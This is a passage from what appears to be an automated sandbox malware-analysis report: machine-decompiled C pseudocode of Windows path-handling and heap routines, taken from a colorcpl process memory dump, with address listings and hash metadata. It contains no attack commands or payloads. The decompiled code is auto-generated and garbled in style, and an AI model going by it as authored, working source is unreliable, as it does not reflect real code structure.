                                                                                                				signed int _v24;
                                                                                                				char _v532;
                                                                                                				char _v540;
                                                                                                				signed short _v544;
                                                                                                				signed int _v548;
                                                                                                				signed short* _v552;
                                                                                                				signed short _v556;
                                                                                                				signed short* _v560;
                                                                                                				signed short* _v564;
                                                                                                				signed short* _v568;
                                                                                                				void* _v570;
                                                                                                				signed short* _v572;
                                                                                                				signed short _v576;
                                                                                                				signed int _v580;
                                                                                                				char _v581;
                                                                                                				void* _v584;
                                                                                                				unsigned int _v588;
                                                                                                				signed short* _v592;
                                                                                                				void* _v597;
                                                                                                				void* _v600;
                                                                                                				void* _v604;
                                                                                                				void* _v609;
                                                                                                				void* _v616;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				unsigned int _t161;
                                                                                                				signed int _t162;
                                                                                                				unsigned int _t163;
                                                                                                				void* _t169;
                                                                                                				signed short _t173;
                                                                                                				signed short _t177;
                                                                                                				signed short _t181;
                                                                                                				unsigned int _t182;
                                                                                                				signed int _t185;
                                                                                                				signed int _t213;
                                                                                                				signed int _t225;
                                                                                                				short _t233;
                                                                                                				signed char _t234;
                                                                                                				signed int _t242;
                                                                                                				signed int _t243;
                                                                                                				signed int _t244;
                                                                                                				signed int _t245;
                                                                                                				signed int _t250;
                                                                                                				void* _t251;
                                                                                                				signed short* _t254;
                                                                                                				void* _t255;
                                                                                                				signed int _t256;
                                                                                                				void* _t257;
                                                                                                				signed short* _t260;
                                                                                                				signed short _t265;
                                                                                                				signed short* _t269;
                                                                                                				signed short _t271;
                                                                                                				signed short** _t272;
                                                                                                				signed short* _t275;
                                                                                                				signed short _t282;
                                                                                                				signed short _t283;
                                                                                                				signed short _t290;
                                                                                                				signed short _t299;
                                                                                                				signed short _t307;
                                                                                                				signed int _t308;
                                                                                                				signed short _t311;
                                                                                                				signed short* _t315;
                                                                                                				signed short _t316;
                                                                                                				void* _t317;
                                                                                                				void* _t319;
                                                                                                				signed short* _t321;
                                                                                                				void* _t322;
                                                                                                				void* _t323;
                                                                                                				unsigned int _t324;
                                                                                                				signed int _t325;
                                                                                                				void* _t326;
                                                                                                				signed int _t327;
                                                                                                				signed int _t329;
                                                                                                
                                                                                                				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                                                                                				_v8 =  *0x6f0d360 ^ _t329;
                                                                                                				_t157 = _a8;
                                                                                                				_t321 = _a4;
                                                                                                				_t315 = __edx;
                                                                                                				_v548 = __ecx;
                                                                                                				_t305 = _a20;
                                                                                                				_v560 = _a12;
                                                                                                				_t260 = _a16;
                                                                                                				_v564 = __edx;
                                                                                                				_v580 = _a8;
                                                                                                				_v572 = _t260;
                                                                                                				_v544 = _a20;
                                                                                                				if( *__edx <= 8) {
                                                                                                					L3:
                                                                                                					if(_t260 != 0) {
                                                                                                						 *_t260 = 0;
                                                                                                					}
                                                                                                					_t254 =  &_v532;
                                                                                                					_v588 = 0x208;
                                                                                                					if((_v548 & 0x00000001) != 0) {
                                                                                                						_v556 =  *_t315;
                                                                                                						_v552 = _t315[2];
                                                                                                						_t161 = E06E4F232( &_v556);
                                                                                                						_t316 = _v556;
                                                                                                						_v540 = _t161;
                                                                                                						goto L17;
                                                                                                					} else {
                                                                                                						_t306 = 0x208;
                                                                                                						_t298 = _t315;
                                                                                                						_t316 = E06E36E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                                                                                						if(_t316 == 0) {
                                                                                                							L68:
                                                                                                							_t322 = 0xc0000033;
                                                                                                							goto L39;
                                                                                                						} else {
                                                                                                							while(_v581 == 0) {
                                                                                                								_t233 = _v588;
                                                                                                								if(_t316 > _t233) {
                                                                                                									_t234 = _v548;
                                                                                                									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                                                                                										_t254 = L06E34620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                                                                                										if(_t254 == 0) {
                                                                                                											_t169 = 0xc0000017;
                                                                                                										} else {
                                                                                                											_t298 = _v564;
                                                                                                											_v588 = _t316;
                                                                                                											_t306 = _t316;
                                                                                                											_t316 = E06E36E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                                                                                											if(_t316 != 0) {
                                                                                                												continue;
                                                                                                											} else {
                                                                                                												goto L68;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										goto L90;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_v556 = _t316;
                                                                                                									 *((short*)(_t329 + 0x32)) = _t233;
                                                                                                									_v552 = _t254;
                                                                                                									if(_t316 < 2) {
                                                                                                										L11:
                                                                                                										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                                                                                											_t161 = 5;
                                                                                                										} else {
                                                                                                											if(_t316 < 6) {
                                                                                                												L87:
                                                                                                												_t161 = 3;
                                                                                                											} else {
                                                                                                												_t242 = _t254[2] & 0x0000ffff;
                                                                                                												if(_t242 != 0x5c) {
                                                                                                													if(_t242 == 0x2f) {
                                                                                                														goto L16;
                                                                                                													} else {
                                                                                                														goto L87;
                                                                                                													}
                                                                                                													goto L101;
                                                                                                												} else {
                                                                                                													L16:
                                                                                                													_t161 = 2;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t243 =  *_t254 & 0x0000ffff;
                                                                                                										if(_t243 == 0x5c || _t243 == 0x2f) {
                                                                                                											if(_t316 < 4) {
                                                                                                												L81:
                                                                                                												_t161 = 4;
                                                                                                												goto L17;
                                                                                                											} else {
                                                                                                												_t244 = _t254[1] & 0x0000ffff;
                                                                                                												if(_t244 != 0x5c) {
                                                                                                													if(_t244 == 0x2f) {
                                                                                                														goto L60;
                                                                                                													} else {
                                                                                                														goto L81;
                                                                                                													}
                                                                                                												} else {
                                                                                                													L60:
                                                                                                													if(_t316 < 6) {
                                                                                                														L83:
                                                                                                														_t161 = 1;
                                                                                                														goto L17;
                                                                                                													} else {
                                                                                                														_t245 = _t254[2] & 0x0000ffff;
                                                                                                														if(_t245 != 0x2e) {
                                                                                                															if(_t245 == 0x3f) {
                                                                                                																goto L62;
                                                                                                															} else {
                                                                                                																goto L83;
                                                                                                															}
                                                                                                														} else {
                                                                                                															L62:
                                                                                                															if(_t316 < 8) {
                                                                                                																L85:
                                                                                                																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                                                                                																goto L17;
                                                                                                															} else {
                                                                                                																_t250 = _t254[3] & 0x0000ffff;
                                                                                                																if(_t250 != 0x5c) {
                                                                                                																	if(_t250 == 0x2f) {
                                                                                                																		goto L64;
                                                                                                																	} else {
                                                                                                																		goto L85;
                                                                                                																	}
                                                                                                																} else {
                                                                                                																	L64:
                                                                                                																	_t161 = 6;
                                                                                                																	goto L17;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											goto L101;
                                                                                                										} else {
                                                                                                											goto L11;
                                                                                                										}
                                                                                                									}
                                                                                                									L17:
                                                                                                									if(_t161 != 2) {
                                                                                                										_t162 = _t161 - 1;
                                                                                                										if(_t162 > 5) {
                                                                                                											goto L18;
                                                                                                										} else {
                                                                                                											switch( *((intOrPtr*)(_t162 * 4 +  &M06E345F8))) {
                                                                                                												case 0:
                                                                                                													_v568 = 0x6df1078;
                                                                                                													__eax = 2;
                                                                                                													goto L20;
                                                                                                												case 1:
                                                                                                													goto L18;
                                                                                                												case 2:
                                                                                                													_t163 = 4;
                                                                                                													goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                										goto L41;
                                                                                                									} else {
                                                                                                										L18:
                                                                                                										_t163 = 0;
                                                                                                										L19:
                                                                                                										_v568 = 0x6df11c4;
                                                                                                									}
                                                                                                									L20:
                                                                                                									_v588 = _t163;
                                                                                                									_v564 = _t163 + _t163;
                                                                                                									_t306 =  *_v568 & 0x0000ffff;
                                                                                                									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                                                                                									_v576 = _t265;
                                                                                                									if(_t265 > 0xfffe) {
                                                                                                										L90:
                                                                                                										_t322 = 0xc0000106;
                                                                                                									} else {
                                                                                                										if(_t321 != 0) {
                                                                                                											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                                                                                												if(_v580 != 0) {
                                                                                                													goto L23;
                                                                                                												} else {
                                                                                                													_t322 = 0xc0000106;
                                                                                                													goto L39;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t177 = _t306;
                                                                                                												goto L25;
                                                                                                											}
                                                                                                											goto L101;
                                                                                                										} else {
                                                                                                											if(_v580 == _t321) {
                                                                                                												_t322 = 0xc000000d;
                                                                                                											} else {
                                                                                                												L23:
                                                                                                												_t173 = L06E34620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                                                												_t269 = _v592;
                                                                                                												_t269[2] = _t173;
                                                                                                												if(_t173 == 0) {
                                                                                                													_t322 = 0xc0000017;
                                                                                                												} else {
                                                                                                													_t316 = _v556;
                                                                                                													 *_t269 = 0;
                                                                                                													_t321 = _t269;
                                                                                                													_t269[1] = _v576;
                                                                                                													_t177 =  *_v568 & 0x0000ffff;
                                                                                                													L25:
                                                                                                													_v580 = _t177;
                                                                                                													if(_t177 == 0) {
                                                                                                														L29:
                                                                                                														_t307 =  *_t321 & 0x0000ffff;
                                                                                                													} else {
                                                                                                														_t290 =  *_t321 & 0x0000ffff;
                                                                                                														_v576 = _t290;
                                                                                                														_t310 = _t177 & 0x0000ffff;
                                                                                                														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                                                															_t307 =  *_t321 & 0xffff;
                                                                                                														} else {
                                                                                                															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                                                															E06E5F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                                                															_t329 = _t329 + 0xc;
                                                                                                															_t311 = _v580;
                                                                                                															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                                                															 *_t321 = _t225;
                                                                                                															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                															}
                                                                                                															goto L29;
                                                                                                														}
                                                                                                													}
                                                                                                													_t271 = _v556 - _v588 + _v588;
                                                                                                													_v580 = _t307;
                                                                                                													_v576 = _t271;
                                                                                                													if(_t271 != 0) {
                                                                                                														_t308 = _t271 & 0x0000ffff;
                                                                                                														_v588 = _t308;
                                                                                                														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                                                															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                                                															E06E5F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                                                															_t329 = _t329 + 0xc;
                                                                                                															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                                                															 *_t321 = _t213;
                                                                                                															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                                                																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                													_t272 = _v560;
                                                                                                													if(_t272 != 0) {
                                                                                                														 *_t272 = _t321;
                                                                                                													}
                                                                                                													_t306 = 0;
                                                                                                													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                													_t275 = _v572;
                                                                                                													if(_t275 != 0) {
                                                                                                														_t306 =  *_t275;
                                                                                                														if(_t306 != 0) {
                                                                                                															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                                                														}
                                                                                                													}
                                                                                                													_t181 = _v544;
                                                                                                													if(_t181 != 0) {
                                                                                                														 *_t181 = 0;
                                                                                                														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                                                														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                                                														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                                                														if(_v540 == 5) {
                                                                                                															_t182 = E06E152A5(1);
                                                                                                															_v588 = _t182;
                                                                                                															if(_t182 == 0) {
                                                                                                																E06E2EB70(1, 0x6f079a0);
                                                                                                																goto L38;
                                                                                                															} else {
                                                                                                																_v560 = _t182 + 0xc;
                                                                                                																_t185 = E06E2AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                                                																if(_t185 == 0) {
                                                                                                																	_t324 = _v588;
                                                                                                																	goto L97;
                                                                                                																} else {
                                                                                                																	_t306 = _v544;
                                                                                                																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                                                																	 *(_t306 + 4) = _t282;
                                                                                                																	_v576 = _t282;
                                                                                                																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                                                																	 *_t306 = _t325;
                                                                                                																	if( *_t282 == 0x5c) {
                                                                                                																		_t149 = _t325 - 2; // -2
                                                                                                																		_t283 = _t149;
                                                                                                																		 *_t306 = _t283;
                                                                                                																		 *(_t306 + 4) = _v576 + 2;
                                                                                                																		_t185 = _t283 & 0x0000ffff;
                                                                                                																	}
                                                                                                																	_t324 = _v588;
                                                                                                																	 *(_t306 + 2) = _t185;
                                                                                                																	if((_v548 & 0x00000002) == 0) {
                                                                                                																		L97:
                                                                                                																		asm("lock xadd [esi], eax");
                                                                                                																		if((_t185 | 0xffffffff) == 0) {
                                                                                                																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                                                																			E06E595D0();
                                                                                                																			L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		 *(_t306 + 0xc) = _t324;
                                                                                                																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                                                																	}
                                                                                                																	goto L38;
                                                                                                																}
                                                                                                															}
                                                                                                															goto L41;
                                                                                                														}
                                                                                                													}
                                                                                                													L38:
                                                                                                													_t322 = 0;
                                                                                                												}
                                                                                                											}
                                                                                                										}
                                                                                                									}
                                                                                                									L39:
                                                                                                									if(_t254 !=  &_v532) {
                                                                                                										L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                                                									}
                                                                                                									_t169 = _t322;
                                                                                                								}
                                                                                                								goto L41;
                                                                                                							}
                                                                                                							goto L68;
                                                                                                						}
                                                                                                					}
                                                                                                					L41:
                                                                                                					_pop(_t317);
                                                                                                					_pop(_t323);
                                                                                                					_pop(_t255);
                                                                                                					return E06E5B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                                                				} else {
                                                                                                					_t299 = __edx[2];
                                                                                                					if( *_t299 == 0x5c) {
                                                                                                						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                                                						if(_t256 != 0x5c) {
                                                                                                							if(_t256 != 0x3f) {
                                                                                                								goto L2;
                                                                                                							} else {
                                                                                                								goto L50;
                                                                                                							}
                                                                                                						} else {
                                                                                                							L50:
                                                                                                							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                                                								goto L2;
                                                                                                							} else {
                                                                                                								_t251 = E06E53D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                                                								_pop(_t319);
                                                                                                								_pop(_t326);
                                                                                                								_pop(_t257);
                                                                                                								return E06E5B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						L2:
                                                                                                						_t260 = _v572;
                                                                                                						goto L3;
                                                                                                					}
                                                                                                				}
                                                                                                				L101:
                                                                                                			}















































































                                                                                                0x06e34588
                                                                                                0x06e34588
                                                                                                0x06e3458c
                                                                                                0x06e7e1c4
                                                                                                0x06e7e1c4
                                                                                                0x00000000
                                                                                                0x06e34592
                                                                                                0x06e34592
                                                                                                0x06e34599
                                                                                                0x06e7e1be
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3459f
                                                                                                0x06e3459f
                                                                                                0x06e345a3
                                                                                                0x06e7e1d7
                                                                                                0x06e7e1e4
                                                                                                0x00000000
                                                                                                0x06e345a9
                                                                                                0x06e345a9
                                                                                                0x06e345b0
                                                                                                0x06e7e1d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e345b6
                                                                                                0x06e345b6
                                                                                                0x06e345b6
                                                                                                0x00000000
                                                                                                0x06e345b6
                                                                                                0x06e345b0
                                                                                                0x06e345a3
                                                                                                0x06e34599
                                                                                                0x06e3458c
                                                                                                0x06e34582
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e341f4
                                                                                                0x06e3423e
                                                                                                0x06e34241
                                                                                                0x06e345c0
                                                                                                0x06e345c4
                                                                                                0x00000000
                                                                                                0x06e345ca
                                                                                                0x06e345ca
                                                                                                0x00000000
                                                                                                0x06e7e207
                                                                                                0x06e7e20f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e345d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e345ca
                                                                                                0x00000000
                                                                                                0x06e34247
                                                                                                0x06e34247
                                                                                                0x06e34247
                                                                                                0x06e34249
                                                                                                0x06e34249
                                                                                                0x06e34249
                                                                                                0x06e34251
                                                                                                0x06e34251
                                                                                                0x06e34257
                                                                                                0x06e3425f
                                                                                                0x06e3426e
                                                                                                0x06e34270
                                                                                                0x06e3427a
                                                                                                0x06e7e219
                                                                                                0x06e7e219
                                                                                                0x06e34280
                                                                                                0x06e34282
                                                                                                0x06e34456
                                                                                                0x06e345ea
                                                                                                0x00000000
                                                                                                0x06e345f0
                                                                                                0x06e7e223
                                                                                                0x00000000
                                                                                                0x06e7e223
                                                                                                0x06e3445c
                                                                                                0x06e3445c
                                                                                                0x00000000
                                                                                                0x06e3445c
                                                                                                0x00000000
                                                                                                0x06e34288
                                                                                                0x06e3428c
                                                                                                0x06e7e298
                                                                                                0x06e34292
                                                                                                0x06e34292
                                                                                                0x06e3429e
                                                                                                0x06e342a3
                                                                                                0x06e342a7
                                                                                                0x06e342ac
                                                                                                0x06e7e22d
                                                                                                0x06e342b2
                                                                                                0x06e342b2
                                                                                                0x06e342b9
                                                                                                0x06e342bc
                                                                                                0x06e342c2
                                                                                                0x06e342ca
                                                                                                0x06e342cd
                                                                                                0x06e342cd
                                                                                                0x06e342d4
                                                                                                0x06e3433f
                                                                                                0x06e3433f
                                                                                                0x06e342d6
                                                                                                0x06e342d6
                                                                                                0x06e342d9
                                                                                                0x06e342dd
                                                                                                0x06e342eb
                                                                                                0x06e7e23a
                                                                                                0x06e342f1
                                                                                                0x06e34305
                                                                                                0x06e3430d
                                                                                                0x06e34315
                                                                                                0x06e34318
                                                                                                0x06e3431f
                                                                                                0x06e34322
                                                                                                0x06e3432e
                                                                                                0x06e3433b
                                                                                                0x06e3433b
                                                                                                0x00000000
                                                                                                0x06e3432e
                                                                                                0x06e342eb
                                                                                                0x06e3434c
                                                                                                0x06e3434e
                                                                                                0x06e34352
                                                                                                0x06e34359
                                                                                                0x06e3435e
                                                                                                0x06e34361
                                                                                                0x06e3436e
                                                                                                0x06e3438a
                                                                                                0x06e3438e
                                                                                                0x06e34396
                                                                                                0x06e3439e
                                                                                                0x06e343a1
                                                                                                0x06e343ad
                                                                                                0x06e343bb
                                                                                                0x06e343bb
                                                                                                0x06e343ad
                                                                                                0x06e3436e
                                                                                                0x06e343bf
                                                                                                0x06e343c5
                                                                                                0x06e34463
                                                                                                0x06e34463
                                                                                                0x06e343ce
                                                                                                0x06e343d5
                                                                                                0x06e343d9
                                                                                                0x06e343df
                                                                                                0x06e34475
                                                                                                0x06e34479
                                                                                                0x06e34491
                                                                                                0x06e34491
                                                                                                0x06e34479
                                                                                                0x06e343e5
                                                                                                0x06e343eb
                                                                                                0x06e343f4
                                                                                                0x06e343f6
                                                                                                0x06e343f9
                                                                                                0x06e343fc
                                                                                                0x06e343ff
                                                                                                0x06e344e8
                                                                                                0x06e344ed
                                                                                                0x06e344f3
                                                                                                0x06e7e247
                                                                                                0x00000000
                                                                                                0x06e344f9
                                                                                                0x06e34504
                                                                                                0x06e34508
                                                                                                0x06e3450f
                                                                                                0x06e7e269
                                                                                                0x00000000
                                                                                                0x06e34515
                                                                                                0x06e34519
                                                                                                0x06e34531
                                                                                                0x06e34534
                                                                                                0x06e34537
                                                                                                0x06e3453e
                                                                                                0x06e34541
                                                                                                0x06e3454a
                                                                                                0x06e7e255
                                                                                                0x06e7e255
                                                                                                0x06e7e25b
                                                                                                0x06e7e25e
                                                                                                0x06e7e261
                                                                                                0x06e7e261
                                                                                                0x06e34555
                                                                                                0x06e34559
                                                                                                0x06e3455d
                                                                                                0x06e7e26d
                                                                                                0x06e7e270
                                                                                                0x06e7e274
                                                                                                0x06e7e27a
                                                                                                0x06e7e27d
                                                                                                0x06e7e28e
                                                                                                0x06e7e28e
                                                                                                0x06e34563
                                                                                                0x06e34563
                                                                                                0x06e34569
                                                                                                0x06e34569
                                                                                                0x00000000
                                                                                                0x06e3455d
                                                                                                0x06e3450f
                                                                                                0x00000000
                                                                                                0x06e344f3
                                                                                                0x06e343ff
                                                                                                0x06e34405
                                                                                                0x06e34405
                                                                                                0x06e34405
                                                                                                0x06e342ac
                                                                                                0x06e3428c
                                                                                                0x06e34282
                                                                                                0x06e34407
                                                                                                0x06e3440d
                                                                                                0x06e7e2af
                                                                                                0x06e7e2af
                                                                                                0x06e34413
                                                                                                0x06e34413
                                                                                                0x00000000
                                                                                                0x06e341d4
                                                                                                0x00000000
                                                                                                0x06e341c3
                                                                                                0x06e341bd
                                                                                                0x06e34415
                                                                                                0x06e34415
                                                                                                0x06e34416
                                                                                                0x06e34417
                                                                                                0x06e34429
                                                                                                0x06e3416e
                                                                                                0x06e3416e
                                                                                                0x06e34175
                                                                                                0x06e34498
                                                                                                0x06e3449f
                                                                                                0x06e7e12d
                                                                                                0x00000000
                                                                                                0x06e7e133
                                                                                                0x00000000
                                                                                                0x06e7e133
                                                                                                0x06e344a5
                                                                                                0x06e344a5
                                                                                                0x06e344aa
                                                                                                0x00000000
                                                                                                0x06e344bb
                                                                                                0x06e344ca
                                                                                                0x06e344d6
                                                                                                0x06e344d7
                                                                                                0x06e344d8
                                                                                                0x06e344e3
                                                                                                0x06e344e3
                                                                                                0x06e344aa
                                                                                                0x06e3417b
                                                                                                0x06e3417b
                                                                                                0x06e3417b
                                                                                                0x00000000
                                                                                                0x06e3417b
                                                                                                0x06e34175
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8716589181f1d4dc4dddfd3651693eb5082ab731de4eef4a3c940b8105754db6
                                                                                                • Instruction ID: ff28e6f716f86332e35f4836869dbe468110020b8c973457bd7a3c6b6601933b
                                                                                                • Opcode Fuzzy Hash: 8716589181f1d4dc4dddfd3651693eb5082ab731de4eef4a3c940b8105754db6
                                                                                                • Instruction Fuzzy Hash: 84F17E70908361CFD794CF18C484A7AB7E1EF88708F15696EF896CB290E734D995CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 87%
                                                                                                			E06E2D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v20;
                                                                                                				signed int _v36;
                                                                                                				intOrPtr* _v40;
                                                                                                				signed int _v44;
                                                                                                				signed int _v48;
                                                                                                				signed char _v52;
                                                                                                				signed int _v60;
                                                                                                				signed int _v64;
                                                                                                				signed int _v68;
                                                                                                				signed int _v72;
                                                                                                				signed int _v76;
                                                                                                				intOrPtr _v80;
                                                                                                				signed int _v84;
                                                                                                				intOrPtr _v100;
                                                                                                				intOrPtr _v104;
                                                                                                				signed int _v108;
                                                                                                				signed int _v112;
                                                                                                				signed int _v116;
                                                                                                				intOrPtr _v120;
                                                                                                				signed int _v132;
                                                                                                				char _v140;
                                                                                                				char _v144;
                                                                                                				char _v157;
                                                                                                				signed int _v164;
                                                                                                				signed int _v168;
                                                                                                				signed int _v169;
                                                                                                				intOrPtr _v176;
                                                                                                				signed int _v180;
                                                                                                				signed int _v184;
                                                                                                				intOrPtr _v188;
                                                                                                				signed int _v192;
                                                                                                				signed int _v200;
                                                                                                				signed int _v208;
                                                                                                				intOrPtr* _v212;
                                                                                                				char _v216;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				signed int _t204;
                                                                                                				signed int _t206;
                                                                                                				void* _t208;
                                                                                                				signed int _t211;
                                                                                                				signed int _t216;
                                                                                                				intOrPtr _t217;
                                                                                                				intOrPtr* _t218;
                                                                                                				signed int _t226;
                                                                                                				signed int _t239;
                                                                                                				signed int* _t247;
                                                                                                				signed int _t249;
                                                                                                				void* _t252;
                                                                                                				signed int _t256;
                                                                                                				signed int _t269;
                                                                                                				signed int _t271;
                                                                                                				signed int _t277;
                                                                                                				signed int _t279;
                                                                                                				intOrPtr _t283;
                                                                                                				signed int _t287;
                                                                                                				signed int _t288;
                                                                                                				void* _t289;
                                                                                                				signed char _t290;
                                                                                                				signed int _t292;
                                                                                                				signed int* _t293;
                                                                                                				unsigned int _t297;
                                                                                                				signed int _t306;
                                                                                                				signed int _t307;
                                                                                                				signed int _t308;
                                                                                                				signed int _t309;
                                                                                                				signed int _t310;
                                                                                                				intOrPtr _t311;
                                                                                                				intOrPtr _t312;
                                                                                                				signed int _t319;
                                                                                                				signed int _t320;
                                                                                                				signed int* _t324;
                                                                                                				signed int _t337;
                                                                                                				signed int _t338;
                                                                                                				signed int _t339;
                                                                                                				signed int* _t340;
                                                                                                				void* _t341;
                                                                                                				signed int _t344;
                                                                                                				signed int _t348;
                                                                                                				signed int _t349;
                                                                                                				signed int _t351;
                                                                                                				intOrPtr _t353;
                                                                                                				void* _t354;
                                                                                                				signed int _t356;
                                                                                                				signed int _t358;
                                                                                                				intOrPtr _t359;
                                                                                                				signed int _t361;
                                                                                                				signed int _t363;
                                                                                                				signed short* _t365;
                                                                                                				void* _t367;
                                                                                                				intOrPtr _t369;
                                                                                                				void* _t370;
                                                                                                				signed int _t371;
                                                                                                				signed int _t372;
                                                                                                				void* _t374;
                                                                                                				signed int _t376;
                                                                                                				void* _t384;
                                                                                                				signed int _t387;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t376;
                                                                                                				_t2 =  &_a20;
                                                                                                				 *_t2 = _a20 & 0x00000001;
                                                                                                				_t287 = _a4;
                                                                                                				_v200 = _a12;
                                                                                                				_t365 = _a8;
                                                                                                				_v212 = _a16;
                                                                                                				_v180 = _a24;
                                                                                                				_v168 = 0;
                                                                                                				_v157 = 0;
                                                                                                				if( *_t2 != 0) {
                                                                                                					__eflags = E06E26600(0x6f052d8);
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L1;
                                                                                                					} else {
                                                                                                						_v188 = 6;
                                                                                                					}
                                                                                                				} else {
                                                                                                					L1:
                                                                                                					_v188 = 9;
                                                                                                				}
                                                                                                				if(_t365 == 0) {
                                                                                                					_v164 = 0;
                                                                                                					goto L5;
                                                                                                				} else {
                                                                                                					_t363 =  *_t365 & 0x0000ffff;
                                                                                                					_t341 = _t363 + 1;
                                                                                                					if((_t365[1] & 0x0000ffff) < _t341) {
                                                                                                						L109:
                                                                                                						__eflags = _t341 - 0x80;
                                                                                                						if(_t341 <= 0x80) {
                                                                                                							_t281 =  &_v140;
                                                                                                							_v164 =  &_v140;
                                                                                                							goto L114;
                                                                                                						} else {
                                                                                                							_t283 =  *0x6f07b9c; // 0x0
                                                                                                							_t281 = L06E34620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                                                                							_v164 = _t281;
                                                                                                							__eflags = _t281;
                                                                                                							if(_t281 != 0) {
                                                                                                								_v157 = 1;
                                                                                                								L114:
                                                                                                								E06E5F3E0(_t281, _t365[2], _t363);
                                                                                                								_t200 = _v164;
                                                                                                								 *((char*)(_v164 + _t363)) = 0;
                                                                                                								goto L5;
                                                                                                							} else {
                                                                                                								_t204 = 0xc000009a;
                                                                                                								goto L47;
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t200 = _t365[2];
                                                                                                						_v164 = _t200;
                                                                                                						if( *((char*)(_t200 + _t363)) != 0) {
                                                                                                							goto L109;
                                                                                                						} else {
                                                                                                							while(1) {
                                                                                                								L5:
                                                                                                								_t353 = 0;
                                                                                                								_t342 = 0x1000;
                                                                                                								_v176 = 0;
                                                                                                								if(_t287 == 0) {
                                                                                                									break;
                                                                                                								}
